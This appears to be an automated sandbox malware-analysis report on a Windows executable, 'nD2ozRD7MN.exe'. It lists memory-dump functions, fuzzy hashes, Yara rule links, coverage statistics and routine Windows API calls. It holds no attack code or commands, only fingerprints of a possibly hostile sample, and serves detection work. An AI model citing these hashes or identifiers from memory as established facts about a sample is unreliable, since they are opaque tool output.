Opcode Fuzzy Hash: 0f6e8f6cf7ce445b9216b52ad15964d63da2552429fc7df5a1f479db1d32ec7c
Instruction Fuzzy Hash: 97E09A75D0010CEFCB44DFE4D5459DDBBB5EB48200F1081A6D905A3200EB315B15DF80

Function 07F33C40 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 187de38c9f955ab0187b79231b2931dde77708d45f7cd181a81c35d890a34ca0
Instruction ID: 7c802324f505c16bf0bbbaaccaeabd384f33e1978aad6d2a4c098f38033474db
Opcode Fuzzy Hash: 187de38c9f955ab0187b79231b2931dde77708d45f7cd181a81c35d890a34ca0
Instruction Fuzzy Hash: 21D017317105248FC618AB39D458BA973EAEF88B61F0800AAE40AC7262CE619C008BC5

Function 07F342E0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d8c6aad46434716a1abb2cf506ec635f1ff9a5370b42065fe77a238b550d82
Instruction ID: e781a8e4e2b32ccb0267bb1ae4b0e3938bd079fb5573759e8da5a91e42aa0abe
Opcode Fuzzy Hash: c6d8c6aad46434716a1abb2cf506ec635f1ff9a5370b42065fe77a238b550d82
Instruction Fuzzy Hash: 5FD05E36680204AFEB809BA0D812FD93B35EB68310F149055E9499B222C2368453EB10

Function 07F3A3B2 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 105bcb834aa64fc82fb715ef1bd1f5694b89f5dffc06c462c178a8fdca387c90
Instruction ID: 20baf9038d436d58c74e4de11619d288a225d7da46d9d660a64fb6fe09816df5
Opcode Fuzzy Hash: 105bcb834aa64fc82fb715ef1bd1f5694b89f5dffc06c462c178a8fdca387c90
Instruction Fuzzy Hash: 79D0C971101604DFC705DB68EA859517BB8EF45708358C5A8B4098B222DB72EC42DA94

Function 07F3A3B8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4378f463939ec215d2348f9459d2bbe0914d32fc1517a45664261b2f386d6ca2
Instruction ID: 48602e0fb3e1eade31fb6ff498150f44a554ca6376cf6024915c571a0a6742ba
Opcode Fuzzy Hash: 4378f463939ec215d2348f9459d2bbe0914d32fc1517a45664261b2f386d6ca2
Instruction Fuzzy Hash: 67D012B0200204CFC705DBA8EA848117BA8EF49708358C5A8F0088F233DB73EC42DAA0

Function 07F342F0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7533f25b3d4631108ff4685167a2653564d1f78251b4cee7fb2a31fafc7758b8
Instruction ID: 925ac263b5da84b38c2fc1ec4c3630bd46f554215f214983ca1a4490ee24b18d
Opcode Fuzzy Hash: 7533f25b3d4631108ff4685167a2653564d1f78251b4cee7fb2a31fafc7758b8
Instruction Fuzzy Hash: B1C08C36300208FFDB80AFD4C801D9A776DBB58710F50D000FA0C0F201C272E8A2DBA0

Non-executed Functions

Function 07F32C38 Relevance: 8.0, Strings: 6, Instructions: 508COMMON

Download Yara Rule

Strings

4'eq, xrefs: 07F32CAE
4|jq, xrefs: 07F32E43
4'eq, xrefs: 07F32C53
$eq, xrefs: 07F32D00
4'eq, xrefs: 07F32CDE
4|jq, xrefs: 07F32E28

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$4'eq$4|jq$4|jq$$eq
API String ID: 0-3429346994
Opcode ID: 046fa745173b633d250342a81f42d171547ff78ceaea42595f655502713cdef1
Instruction ID: 024c4e349fa511885112325f5dee3ef802f52a450407b2753566fb6c733d8a41
Opcode Fuzzy Hash: 046fa745173b633d250342a81f42d171547ff78ceaea42595f655502713cdef1
Instruction Fuzzy Hash: BB02C4B2B102168FCB19DF79C894A6E7BA6BF85310B2D8469E416CB3A1CF31DC41C791

Function 082B05B8 Relevance: 3.0, Strings: 2, Instructions: 548COMMON

Download Yara Rule

Strings

PHeq, xrefs: 082B0ABB
PHeq, xrefs: 082B0B93

Memory Dump Source

Source File: 00000000.00000002.2037902914.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_82b0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: PHeq$PHeq
API String ID: 0-3382621680
Opcode ID: 858cd97e7547a188117d14fd342d0e25b79f0732c488d9a3bc711fe617130340
Instruction ID: e8ae1da25e14b4ee2897cb00ee9c9adc1c4739d46348478536d69e27c99151b6
Opcode Fuzzy Hash: 858cd97e7547a188117d14fd342d0e25b79f0732c488d9a3bc711fe617130340
Instruction Fuzzy Hash: 84323574B116058FCB19DF69C598AAEB7F2BF88341F2580A9E505EB3A1CB31ED41CB50

Function 074EC188 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

cS?, xrefs: 074EC1E3

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: cS?
API String ID: 0-2624220000
Opcode ID: 34eb072078e3015e7bddd6a5b940769234d67b6dce9904199603a9713fe5e944
Instruction ID: f82d234761d4692cbdda57946be966a19f31ac88c7a7c8ebd6ded77b252b2d6f
Opcode Fuzzy Hash: 34eb072078e3015e7bddd6a5b940769234d67b6dce9904199603a9713fe5e944
Instruction Fuzzy Hash: DFE108B4E102598FCB14DFA9C5809AEFBF6FF89315F24816AD414AB356D730A941CFA0

Function 082B3030 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037902914.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_82b0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d584deb39ab1f41c03f5afbff3b8099962cc0229fff02e1155d938c53a100a
Instruction ID: 9a3f76758443b6d12a973f79df1f19637d1afaca09fef2e512f8e63a6b0266f1
Opcode Fuzzy Hash: b2d584deb39ab1f41c03f5afbff3b8099962cc0229fff02e1155d938c53a100a
Instruction Fuzzy Hash: B0D18970B127429FDB29EB69C4547AEBBF6AF89341F14846DC14A8B390DF35E802CB51

Function 074EBD38 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce6ea7845300cd93c4e79f46c9d6fe32bc39d8247094a45bbc6e7cd96cf33a45
Instruction ID: c6ac86cf652730e3a1ac2cd44f5fbd63da94dabf40bbb14a4ef3b141c350d5fe
Opcode Fuzzy Hash: ce6ea7845300cd93c4e79f46c9d6fe32bc39d8247094a45bbc6e7cd96cf33a45
Instruction Fuzzy Hash: 04E117B4E142598FCB14DFA8C5809AEFBF6FF89315F24816AD414AB356D730A981CF60

Function 07F38C00 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3af4b09852ae85e30707c65702ac62c96c7463f85007690642313acbae07ba41
Instruction ID: 86e20f26e9e0432a947f3927e2778ef59712fcdfcad9aee32400fcb7d7e63ade
Opcode Fuzzy Hash: 3af4b09852ae85e30707c65702ac62c96c7463f85007690642313acbae07ba41
Instruction Fuzzy Hash: F8A1A2B0B102555FDF49EBB8841436F76ABAFC8740F64853D900AEB798DF389D4287A1

Function 074EDCEF Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6137af90805ab2685d50cc651b7ce6c71dd6c85beff342b7742d7a6541e4d26
Instruction ID: 97cf016741a538cb5273948f90d0bfde7411679a99735a9c84829320c0efa845
Opcode Fuzzy Hash: e6137af90805ab2685d50cc651b7ce6c71dd6c85beff342b7742d7a6541e4d26
Instruction Fuzzy Hash: 4DE13AB4E041598FDB14DFA8C5809AEFBF6FF89315F24816AD414AB35AD730A981CF60

Function 074E4600 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eefab49809811083fedb4fa8fc93a7f1250ce87749f6b1eecd19d6d4570b3a8a
Instruction ID: c409a7c27b3995e6f3bf34a13d1627c28792cc2c5f86bf5fa644a2db1e7c10ac
Opcode Fuzzy Hash: eefab49809811083fedb4fa8fc93a7f1250ce87749f6b1eecd19d6d4570b3a8a
Instruction Fuzzy Hash: D3E12CB4E001598FCB14DFA9C5809AEFBF6FF89315F24816AE415AB359D730A942CF60

Function 074ED428 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e07fd1fea7cb6332ccb4a5a4119c063cce7a981c8eb8e0cba43206499dd44136
Instruction ID: 26157eff2d34ae4fc457d21c2e06031cc59648068e519f5a4ff70b609830a57b
Opcode Fuzzy Hash: e07fd1fea7cb6332ccb4a5a4119c063cce7a981c8eb8e0cba43206499dd44136
Instruction Fuzzy Hash: C2E107B4E141598FCB14DFA8C5809AEFBF6FF89315F24816AD414AB359D730A981CFA0

Function 074EE138 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ce958c1cec92ec270ee752f0e6cb66d90aa597f65c116b8d3cbfd378214fba3
Instruction ID: b787b320c33a36c3f52051d84f35fbc200663b9e774a5af9cc274ccc6b59d7cf
Opcode Fuzzy Hash: 9ce958c1cec92ec270ee752f0e6cb66d90aa597f65c116b8d3cbfd378214fba3
Instruction Fuzzy Hash: 44E119B4E102298FDB14DFA9C5809AEFBF6FF89315F24816AD414AB355D730A981CF60

Function 0553CE20 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031092098.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5530000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 692d10efd60c775bd4eaa95cf8bdc8f8926ae887522fa6382310e4d01002c9c6
Instruction ID: 418180c2c66d13b1007ad6ad6371eacadf58200a0f283b7728a693c0535580c4
Opcode Fuzzy Hash: 692d10efd60c775bd4eaa95cf8bdc8f8926ae887522fa6382310e4d01002c9c6
Instruction Fuzzy Hash: DAD11831D20B5ACACB05EBA4DA906D9B7B1FF95300F60D79AE00977254EF706AC5CB81

Function 0553CE30 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031092098.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5530000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b8326be34d4fe2b8dc2dd7cbdfae44d3a4c5aa3bd425c429c0484a309e1a29
Instruction ID: 2c47ce3783e275b729816eba6e68ecee2c3a55af0fcbfd113de6f313302e56d5
Opcode Fuzzy Hash: 17b8326be34d4fe2b8dc2dd7cbdfae44d3a4c5aa3bd425c429c0484a309e1a29
Instruction Fuzzy Hash: 8BD10731D20B5ACACB15EBA4DA906D9B7B1FF95300F60D79AE00937254EF706AC5CB81

Function 013FE04C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013998323.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13f0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b84e7b1e95be2e60956c00756ce0e683881c52576e04bc365361eb8614c7bb36
Instruction ID: 05d118f6872f3c0201b27278290929ab05b51bfa4685f4acf4f99fbb5d491afd
Opcode Fuzzy Hash: b84e7b1e95be2e60956c00756ce0e683881c52576e04bc365361eb8614c7bb36
Instruction Fuzzy Hash: 8CA16D32E0021A8FCF15DFB9C88489EBBB6FF84304B15457EEA05AB265DB71E955CB40

Function 074E580F Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fbf2e0ad9a5f998489385ca55acdb175ee02418004441fed73f6f4b49b92f87
Instruction ID: 31f2d07dbc912ef79f0f29816c5dc2a5185fb18146790303b759070dd0c5ab53
Opcode Fuzzy Hash: 5fbf2e0ad9a5f998489385ca55acdb175ee02418004441fed73f6f4b49b92f87
Instruction Fuzzy Hash: 4C61B4B5E042199FDB08CFAAC9446DEFBF2BF89311F14C16AE418AB355DB345A468B40

Function 074E58A8 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d73628df9864aa63dce87c7cc2b8051633c7b8e5460af434030226ab8eb057be
Instruction ID: 33f934fbe263ff0dbca8d1e5d61b3b1c88ed1b9ef3d23db60ba8e6e125ae94b8
Opcode Fuzzy Hash: d73628df9864aa63dce87c7cc2b8051633c7b8e5460af434030226ab8eb057be
Instruction Fuzzy Hash: 567180B4E012198FCB04DFAAC9849DEFBF2BF89311F14D166E418AB255DB349942CF50

Function 074E5610 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67620f558acc358e050dbe5fb01b1cdde52be669d0cdb1992b5a952bbf97af42
Instruction ID: db1667c12ffdb4a8901eaa3cac0036e2c093cfd0110b7ba1ecfc7b8215c9466d
Opcode Fuzzy Hash: 67620f558acc358e050dbe5fb01b1cdde52be669d0cdb1992b5a952bbf97af42
Instruction Fuzzy Hash: 1C51A5B5D006199FDB08CFE6C9446EEFBB6FF89311F10902AE819AB254DB345A46CF40

Function 074E5897 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ec13f8e7d6039be876b6d075c852ba6097a575a18755949be5b465c727da881
Instruction ID: 7adf74cac40a2b9df46338eca559364e55dc317b08054a2f1a1c9fbb8b783b45
Opcode Fuzzy Hash: 2ec13f8e7d6039be876b6d075c852ba6097a575a18755949be5b465c727da881
Instruction Fuzzy Hash: 3D5192B5E046588FDB08CFAAC9845DEFBF2BF89311F24C16AE418AB354DB3459468F50

Function 074E5602 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c9961b0c98ffcd766c46e2055e3ea7de1e05595619592839b94b25b8276a2f3
Instruction ID: 232fbf3403f0a08824e5cfdb118da98d42f89708f1ec4b5f81a4058c976dcc00
Opcode Fuzzy Hash: 4c9961b0c98ffcd766c46e2055e3ea7de1e05595619592839b94b25b8276a2f3
Instruction Fuzzy Hash: EA4194B5E006199FDB08CFAAD9446EEFBF6EF88311F14C02AD418AB254DB345A46CF50

Analysis Process: nD2ozRD7MN.exePID: 5016, Parent PID: 1892COMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.1%
Total number of Nodes:	142
Total number of Limit Nodes:	11

Executed Functions

Function 078E1D70 Relevance: 1.6, APIs: 1, Instructions: 61timeCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 078E5144

Memory Dump Source

Source File: 00000005.00000002.3558471152.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_78e0000_nD2ozRD7MN.jbxd

Similarity

API ID: SystemTimes
String ID:
API String ID: 375623090-0
Opcode ID: 8930b65208b2ae6ac7c0b9115101b648187c93ae1c5563ec57455694a2b3f99a
Instruction ID: 50a917b9511b07e83581e8fd995d70e4dfb3a3a8f87ce830cde6990235395840
Opcode Fuzzy Hash: 8930b65208b2ae6ac7c0b9115101b648187c93ae1c5563ec57455694a2b3f99a
Instruction Fuzzy Hash: DD21E4B5C01219DFCB50CF99D984ADEFBF8EF59314F14806AE908E7241D3749944CBA4

Function 019BD408 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 019BD496
GetCurrentThread.KERNEL32 ref: 019BD4D3
GetCurrentProcess.KERNEL32 ref: 019BD510
GetCurrentThreadId.KERNEL32 ref: 019BD569

Memory Dump Source

Source File: 00000005.00000002.3542364408.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_19b0000_nD2ozRD7MN.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8b3863daaab9ba306fb80a4cd9a815f12e596662cd789d1fa4d9ef5ef92ed1d3
Instruction ID: 3b3f739e99ee3a35f97306270186edadab148cac6769468c21cd05de54fcd486
Opcode Fuzzy Hash: 8b3863daaab9ba306fb80a4cd9a815f12e596662cd789d1fa4d9ef5ef92ed1d3
Instruction Fuzzy Hash: E15166B09007098FDB14DFA9E688BDEBBF1FF48314F24845ED009A7290D7755984CB65

Function 019BD418 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 019BD496
GetCurrentThread.KERNEL32 ref: 019BD4D3
GetCurrentProcess.KERNEL32 ref: 019BD510
GetCurrentThreadId.KERNEL32 ref: 019BD569

Memory Dump Source

Source File: 00000005.00000002.3542364408.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_19b0000_nD2ozRD7MN.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 03a29eb5d5b3369698dc91c9a7aff2a6ef8af9cfa69d69d38c6a860fe0504222
Instruction ID: 0765c8f8017073881293bb04d0b9607b7dfc374a829f60f988820f32111dc4f9
Opcode Fuzzy Hash: 03a29eb5d5b3369698dc91c9a7aff2a6ef8af9cfa69d69d38c6a860fe0504222
Instruction Fuzzy Hash: CC5158B1900309CFDB14DFAAE688BDEBBF5FF48314F248459D009A7250D7746944CB65

Function 078E4E05 Relevance: 1.7, APIs: 1, Instructions: 226
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 078E5144

Memory Dump Source

Source File: 00000005.00000002.3558471152.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_78e0000_nD2ozRD7MN.jbxd

Similarity

API ID: SystemTimes
String ID:
API String ID: 375623090-0
Opcode ID: df1d0e0d34d6a08076d9c9e74721d3ace7832debc6f218dfdeff6921d8ea1d9d
Instruction ID: 5c3a1b963d82976030f8ee13440c16f4321c1960d6d29ce43eecdb30639cf2b0
Opcode Fuzzy Hash: df1d0e0d34d6a08076d9c9e74721d3ace7832debc6f218dfdeff6921d8ea1d9d
Instruction Fuzzy Hash: B8B19EB5D0021ACFDB51CF69C880AD9FBB5FF59310F14C69AD958AB201E770AA85CF90

Function 019BAD88 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 019BAFDE

Memory Dump Source

Source File: 00000005.00000002.3542364408.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_19b0000_nD2ozRD7MN.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: efa3330969a3cfe03e8d4a60a1a09a6a98df8d3a8a8e1c135bf8402e3a9da306
Instruction ID: c28b5e2820efe0b1b11cc0030382010cebde8b57ac0d541065922dbc2ab2b8d2
Opcode Fuzzy Hash: efa3330969a3cfe03e8d4a60a1a09a6a98df8d3a8a8e1c135bf8402e3a9da306
Instruction Fuzzy Hash: 697124B0A00B058FDB64DF29D58479ABBF5FF88204F008A2ED58AD7A50DB75F945CB90

Function 078E4CF8 Relevance: 1.7, APIs: 1, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3558471152.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_78e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a9f3d01587efa7c4dfcc5a13773b520d40026bf598d28d8cfe372741185e558
Instruction ID: 0c1b6d40f32a0e3844882664a94e89ecbd54ce4a11c9077e2de28cbc2e72683f
Opcode Fuzzy Hash: 9a9f3d01587efa7c4dfcc5a13773b520d40026bf598d28d8cfe372741185e558
Instruction Fuzzy Hash: F4519EB1D05259DFCB00DFA8D984ADEBFF8EF49310F14816AE918E7251E7349918CBA1

Function 078E4DCB Relevance: 1.6, APIs: 1, Instructions: 81
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 078E5144

Memory Dump Source

Source File: 00000005.00000002.3558471152.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_78e0000_nD2ozRD7MN.jbxd

Similarity

API ID: SystemTimes
String ID:
API String ID: 375623090-0
Opcode ID: 4eab20d96a40c0a137be29333b00d45dafbb7f78b406437b25f3cb38daf1c0d9
Instruction ID: 6a4ea6a4b15a4cbb11296531eab39c62134c17c857eb896694ab6f2640c46539
Opcode Fuzzy Hash: 4eab20d96a40c0a137be29333b00d45dafbb7f78b406437b25f3cb38daf1c0d9
Instruction Fuzzy Hash: EA3103B1D05249DFCB40CFA9D980A9EFFF8AF59310F24806AE908E7251E3349944CFA1

Function 078E4DE8 Relevance: 1.6, APIs: 1, Instructions: 81
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 078E5144

Memory Dump Source

Source File: 00000005.00000002.3558471152.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_78e0000_nD2ozRD7MN.jbxd

Similarity

API ID: SystemTimes
String ID:
API String ID: 375623090-0
Opcode ID: 2a567cd03d4db4f2f21985186204da71d847f7e5703ec44d614e460d2cd78ed2
Instruction ID: 0ffc736af6bdfcf71053f27e045095926fbf073d8d5b674a9670c1126c4a4562
Opcode Fuzzy Hash: 2a567cd03d4db4f2f21985186204da71d847f7e5703ec44d614e460d2cd78ed2
Instruction Fuzzy Hash: D031D4B1D05249DFCB10CFA9C980ADDBBF8AF59314F24806AE508E7251D3749945CFA5

Function 019BD658 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 019BD6E7

Memory Dump Source

Source File: 00000005.00000002.3542364408.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_19b0000_nD2ozRD7MN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e0e18cb87bdd5dfaa77e92389123d53466bfb780cb90afdd6bece1e337316021
Instruction ID: 0a7c6035dc07d24d85de84b138b88bf50fe4793998134cc658f3d0340cf16442
Opcode Fuzzy Hash: e0e18cb87bdd5dfaa77e92389123d53466bfb780cb90afdd6bece1e337316021
Instruction Fuzzy Hash: 5F21E3B5900249DFDB10CFAAD984AEEFFF9EB48320F14841AE918A3310D375A940DF64

Function 019BD660 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 019BD6E7

Memory Dump Source

Source File: 00000005.00000002.3542364408.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_19b0000_nD2ozRD7MN.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 86d5c65f7ffb1d075977163560689df986bca320c14bc1767f77d6f5aab84865
Instruction ID: 366d836b2c64576467d760c71331b5e7e1cf6159629e6851398a60d0bca3cd13
Opcode Fuzzy Hash: 86d5c65f7ffb1d075977163560689df986bca320c14bc1767f77d6f5aab84865
Instruction Fuzzy Hash: FA21C2B5900249DFDB10CFAAD984ADEFFF8EB48320F14841AE918A3350D375A944DFA5

Function 019BAF78 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 019BAFDE

Memory Dump Source

Source File: 00000005.00000002.3542364408.00000000019B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false

Joe Sandbox IDA Plugin

